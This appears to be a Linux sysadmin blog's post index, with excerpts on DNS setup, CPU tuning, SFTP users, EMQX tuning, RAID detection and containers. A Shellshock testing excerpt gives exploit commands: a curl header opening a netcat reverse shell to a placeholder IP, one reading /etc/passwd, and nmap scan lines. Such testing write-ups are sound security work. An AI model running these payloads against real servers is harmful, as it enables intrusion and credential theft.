Hero Image
Mosdns-X

Mosdns-X 让 Linux 系统的 DNS 更快更干净:部署 Mosdns-X install bash <(curl -sL https://raw.githubusercontent.com/lidebyte/bashshell/refs/heads/main/mosdns-x-manager.sh) config sudo tee /etc/mosdns-x/config.yaml > /dev/null <<'EOF' # mosdns-x 并发查询(无分流)配置 log: level: info file: /var/log/mosdns-x/mosdns-x.log plugins: # 缓存插件 - tag: cache type: cache args: size: 1024 lazy_cache_ttl: 1800 # 并发上游:取最先返回的可用答案 - tag: forward_all type: fast_forward args: upstream: # 阿里 - addr: "udp://223.5.5.5" - addr: "tls://dns.alidns.com" # DNSPod / doh.pub - addr: "udp://119.29.29.29" - addr: "tls://dot.pub" # Cloudflare - addr: "udp://1.1.1.1" - addr: "tls://cloudflare-dns.com" # Google - addr: "udp://8.8.8.8" - addr: "tls://dns.google" # 主流水线:小缓存 → 并发优选 - tag: main type: sequence args: exec: - cache - forward_all # 监听(双栈 UDP/TCP 53) servers: - exec: main listeners: - addr: :53 protocol: udp - addr: :53 protocol: tcp EOF systemd sudo tee /etc/systemd/system/mosdns.service > /dev/null <<'EOF' [Unit] Description=Mosdns-X DNS Accelerator After=network.target [Service] Type=simple User=root Group=root ExecStart=/usr/local/bin/mosdns-x start --as-service -d /usr/local/bin -c /etc/mosdns-x/config.yaml Restart=always RestartSec=5 StandardOutput=journal StandardError=journal SyslogIdentifier=mosdns [Install] WantedBy=multi-user.target EOF sudo systemctl daemon-reload sudo systemctl enable --now mosdns # 备份系统 DNS sudo cp -n /etc/resolv.conf /etc/resolv.conf.mosdns-backup # 改为使用本地 Mosdns-X echo -e "nameserver 127.0.0.1\noptions edns0" | sudo tee /etc/resolv.conf # 若 53 端口被 systemd-resolved 占用,可禁用它 sudo systemctl disable --now systemd-resolved 2>/dev/null || true # 如果想顺便加锁(防止被 DHCP 修改),加上 chattr 一起执行: echo -e "nameserver 127.0.0.1\n" > /etc/resolv.conf && chattr +i /etc/resolv.conf # 查看进程状态 sudo systemctl status mosdns --no-pager # 测试解析速度(第二次命中缓存更快) dig +stats www.google.com dig +stats www.baidu.com # 查看实时日志 tail -f /var/log/mosdns-x/mosdns-x.log

Sunday, November 9, 2025 Read
Hero Image
Docker 容器无法访问外网?nftables 下的 NAT 配置指南

Docker 容器无法访问外网?nftables 下的 NAT 配置指南

Wednesday, September 3, 2025 Read
Hero Image
独立服务器 CPU 频率最大化配置指南

独立服务器 CPU 频率最大化配置指南 看看 CPU 现在混哪种模式 前提条件 系统:Linux(Debian、Ubuntu、Proxmox 等都行) 权限:root CPU:支持动态调频(Intel Xeon、AMD EPYC / Ryzen 等) governor cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor powersave:节能小绵羊(频率锁低,省电但废武功) ondemand:按需加速(要用时才升频,可能反应慢半拍) performance:全程高能(我们要的就是它!💪) 确认内核到底用的哪种驱动(Intel / AMD) cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver 临时拉满性能 for cpu in /sys/devices/system/cpu/cpu[0-9]*; do echo performance > $cpu/cpufreq/scaling_governor done 重启后也保持高能 方案 A:最稳妥推荐 apt install cpufrequtils -y echo 'GOVERNOR="performance"' >/etc/default/cpufrequtils systemctl enable cpufrequtils systemctl start cpufrequtils 方案 B:systemd 自定义服务 # /etc/systemd/system/cpu-performance.service [Unit] Description=Set CPU governor to performance After=multi-user.target [Service] Type=oneshot ExecStart=/bin/bash -c 'for cpu in /sys/devices/system/cpu/cpu[0-9]*; do echo performance > $cpu/cpufreq/scaling_governor; done' [Install] WantedBy=multi-user.target systemctl daemon-reexec systemctl daemon-reload systemctl enable --now cpu-performance.service

Tuesday, September 2, 2025 Read
Hero Image
透過LinuxServer.io打包的Docker映像檔,將桌面程式轉成網頁版,透過瀏覽器即可使用

透過 LinuxServer.io 打包的 Docker 映像檔,將桌面程式轉成網頁版,透過瀏覽器即可使用 LinuxServer.io 官網

Friday, August 1, 2025 Read
Hero Image
Lightweight Linux Distributions For Older PCs

lightweight-linux-distributions-for-your-pc Name Site Comment Puppy Linux https://puppylinux-woof-ce.github.io/ This tiny OS weighs in at under 300MB, so it can run smoothly even on systems with as little as 512MB of RAM. Bodhi Linux https://www.bodhilinux.com/ System requirements are just 512MB of RAM and a 500MHz processor. Peppermint OS https://peppermintos.com/ It only needs 512MB of RAM to run, so it will fly on that Pentium 4 machine or Core 2 Duo laptop you have stashed in your closet. While Peppermint OS is light on local resources, it integrates well with cloud and web apps. The OS builds in close integration with services like Dropbox, Google Drive, and more. AntiX https://antixlinux.com/ AntiX is designed to run on systems with as little as 64MB of RAM and a Pentium II processor. Lubuntu https://lubuntu.me/ Lubuntu will run smoothly on computers with as little as 512 MB of RAM and a 1 GHz processor.

Tuesday, August 20, 2024 Read
Hero Image
Add SFTP user and share directory

Add SFTP user and share directory dev_test_user, qa_test_user 同權限 dev_user, qa_user 同權限 1. 建立共享資料夾(SFTP 使用的資料夾) sudo mkdir -p /home/{test,prod}/{exchange,upload} sudo mkdir -p /home/{test,prod}/exchange/success sudo mkdir -p /home/{test,prod}/upload/backup 2. 建立使用者群組 sudo groupadd share01-test sudo groupadd share01-prod 3. 創建 qa_test_user 使用者並設定 qa_test_user 使用者的群組為 share01-test sudo useradd -m -G share01-test qa_test_user # 設定 dev_test_user 使用者的群組為 share01-test sudo usermod -G share01-test dev_test_user # 設定密碼 sudo passwd qa_test_user 4. 創建 qa_user 使用者並設定 qa_user 使用者的群組為 share01-prod sudo useradd -m -G share01-prod qa_user # 設定 dev_user 使用者的群組為 share01-prod sudo usermod -G share01-prod dev_user # 設定密碼 sudo passwd qa_user 5. 設定權限 # 設定 /home/test 資料夾(含下級資料夾)的使用者為 qa_test_user,群組為 share01-test sudo chown -R qa_test_user:share01-test test/ # 設定 /home/prod 資料夾(含下級資料夾)的使用者為 qa_user,群組為 share01-prod sudo chown -R qa_user:share01-prod prod/ # SFTP 登入資料夾權限要給 root sudo chown root:root /home/test sudo chown root:root /home/prod 6. 設定 /etc/ssh/sshd_config /etc/ssh/sshd_config

Thursday, November 30, 2023 Read
Hero Image
Container security fundamentals

Container security fundamentals

Wednesday, October 4, 2023 Read
Hero Image
Tuning EMQX to Scale to One Million Concurrent Connection on Kubernetes

Tuning EMQX to Scale to One Million Concurrent Connection on Kubernetes Performance Tuning (Linux) 矽谷牛的耕田筆記 Linux Kernel Tuning node level, basically the non-namespaced sysctls # Sets the maximum number of file handles allowed by the kernel sysctl -w fs.file-max=2097152 # Sets the maximum number of open file descriptors that a process can have sysctl -w fs.nr_open=2097152 namespaced sysctls # Sets the maximum number of connections that can be queued for acceptance by the kernel. sysctl -w net.core.somaxconn=32768 # Sets the maximum number of SYN requests that can be queued by the kernel sysctl -w net.ipv4.tcp_max_syn_backlog=16384 # Setting the minimum, default and maximum size of TCP Buffer sysctl -w net.ipv4.tcp_rmem='1024 4096 16777216' sysctl -w net.ipv4.tcp_wmem='1024 4096 16777216' # Setting Parameters for TCP Connection Tracking sysctl -w net.netfilter.nf_conntrack_tcp_timeout_time_wait=30 # Controls the maximum number of entries in the TCP time-wait bucket table sysctl -w net.ipv4.tcp_max_tw_buckets=1048576 # Controls Timeout for FIN-WAIT-2 Sockets: sysctl -w net.ipv4.tcp_fin_timeout=15 There are some more namespaced sysctls that will improve the performance but because of an active issue we are not able to set them on the container level # Sets the size of the backlog queue for the network device sysctl -w net.core.netdev_max_backlog=16384 # Amount of memory that is allocated for storing incoming and outgoing data for a socket sysctl -w net.core.rmem_default=262144 sysctl -w net.core.wmem_default=262144 # Setting the maximum amount of memory for the socket buffers sysctl -w net.core.rmem_max=16777216 sysctl -w net.core.wmem_max=16777216 sysctl -w net.core.optmem_max=16777216 Erlang VM Tuning ## Erlang Process Limit node.process_limit = 2097152 ## Sets the maximum number of simultaneously existing ports for this system node.max_ports = 2097152 EMQX Broker Tuning # Other configuration… EMQX_LISTENER__TCP__EXTERNAL: "0.0.0.0:1883" EMQX_LISTENER__TCP__EXTERNAL__ACCEPTORS: 64 EMQX_LISTENER__TCP__EXTERNAL__MAX_CONNECTIONS: 1024000

Wednesday, September 27, 2023 Read
Hero Image
有关 MTU 和 MSS 的一切

有关 MTU 和 MSS 的一切

Wednesday, April 12, 2023 Read
Hero Image
How to Detect RAID Information in Linux

How to Detect RAID Information in Linux lspci lspci | grep RAID 00:1f.2 RAID bus controller: Intel Corporation 82801 Mobile SATA Controller [RAID mode] (rev 04) lshw lshw -class storage *-raid description: RAID bus controller product: 82801 Mobile SATA Controller [RAID mode] vendor: Intel Corporation physical id: 1f.2 bus info: pci@0000:00:1f.2 logical name: scsi0 version: 04 width: 32 bits clock: 66MHz capabilities: raid msi pm bus_master cap_list emulated configuration: driver=ahci latency=0 resources: irq:26 ioport:f0d0(size=8) ioport:f0c0(size=4) ioport:f0b0(size=8) ioport:f0a0(size=4) ioport:f060(size=32) memory:f7e36000-f7e367ff smartctl dmesg | grep -i scsi [ 0.210852] SCSI subsystem initialized [ 0.341280] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 243) ... [ 1.213299] scsi 0:0:0:0: Direct-Access ATA ST320LT012-9WS14 YAM1 PQ: 0 ANSI: 5 [ 1.319886] sd 0:0:0:0: [sda] Attached SCSI disk [ 19.571008] sd 0:0:0:0: Attached scsi generic sg0 type 0 smartctl --all /dev/sda Model Family: Seagate Laptop HDD Device Model: ST320LT012-9WS14C Serial Number: S0V3R9LL LU WWN Device Id: 5 000c50 05be4653c Firmware Version: 0001YAM1 User Capacity: 320,072,933,376 bytes [320 GB] Sector Sizes: 512 bytes logical, 4096 bytes physical Rotation Rate: 5400 rpm Form Factor: 2.5 inches Device is: In smartctl database 7.3/5319 ATA Version is: ATA8-ACS T13/1699-D revision 4 SATA Version is: SATA 2.6, 3.0 Gb/s (current: 3.0 Gb/s) Local Time is: Sat Nov 19 20:52:01 2022 PKT SMART support is: Available - device has SMART capability. SMART support is: Enabled ... MegaCLI megacli -LDInfo -Lall -aALL Adapter 0 -- Virtual Drive Information: Virtual Drive: 0 (Target Id: 0) Name : SEAGATE RAID Level : Primary-1, Secondary-0, RAID Level Qualifier-0 Size : 320 GB Sector Size : 512 Mirror Data : 320 GB State : Optimal ... lsscsi lsscsi [0:0:0:0] disk ATA ST320LT012-9WS14 YAM1 /dev/sda Vendor-Specific Tools omreport storage vdisk List of Virtual Disks in the System Controller SEAGATE Laptop HDD ID : 0 Status : Ok Name : SEAGATE State : Ready Hot Spare Policy violated : Not Assigned Encrypted : No Layout : RAID-0 Size : 320.00 GB (343597383680 bytes) T10 Protection Information Status : No Associated Fluid Cache State : Not Applicable Device Name : /dev/sda Bus Protocol : ATA Media : HDD Read Policy : Adaptive Read Ahead Write Policy : Write Back Cache Policy : Not Applicable Stripe Element Size : 128 KB Disk Cache Policy : Enabled

Monday, November 28, 2022 Read
Hero Image
Test Whether a Server Is Vulnerable to Shellshock Bug

Test Whether a Server Is Vulnerable to Shellshock Bug The Shellshock Bug env x=' () {:;};' Exploiting Shellshock Bug A substituted command is executed since the feature ignores the command specified by the user, and instead, it runs that which the ForceCommand defines. The ignored commands from the user are put in the “SSH_ORIGINAL_COMMAND” environment variable. If the user’s default shell is Bash, the Bash shell will parse the value of the “SSH_ORIGINAL_COMMAND” environment variable on start-up and run the embedded commands. Examples of Shellshock Exploit Commands ## 1 curl -H "X-Frame-Options: () {:;};echo;/bin/nc -e /bin/bash 192.168.y.y 443" 192.168.x.y/CGI-bin/hello.cgi ## 2 curl --insecure 192.168.x.x -H "User-Agent: () { :; }; /bin/cat /etc/passwd" use nmap script to test for the vulnerability nmap -sV -p- --script http-shellshock 192.168.x.x nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

Monday, November 28, 2022 Read
Hero Image
Containers from scratch

Containers from scratch Container file systems $ wget https://github.com/ericchiang/containers-from-scratch/releases/download/v0.1.0/rootfs.tar.gz $ sha256sum rootfs.tar.gz c79bfb46b9cf842055761a49161831aee8f4e667ad9e84ab57ab324a49bc828c rootfs.tar.gz $ # tar needs sudo to create /dev files and setup file ownership $ sudo tar -zxf rootfs.tar.gz $ ls rootfs bin dev home lib64 mnt proc run srv tmp var boot etc lib media opt root sbin sys usr $ ls -al rootfs/bin/ls -rwxr-xr-x. 1 root root 118280 Mar 14 2015 rootfs/bin/ls chroot it allows us to restrict a process’ view of the file system. In this case, we’ll restrict our process to the “rootfs” directory then exec a shell.

Thursday, November 24, 2022 Read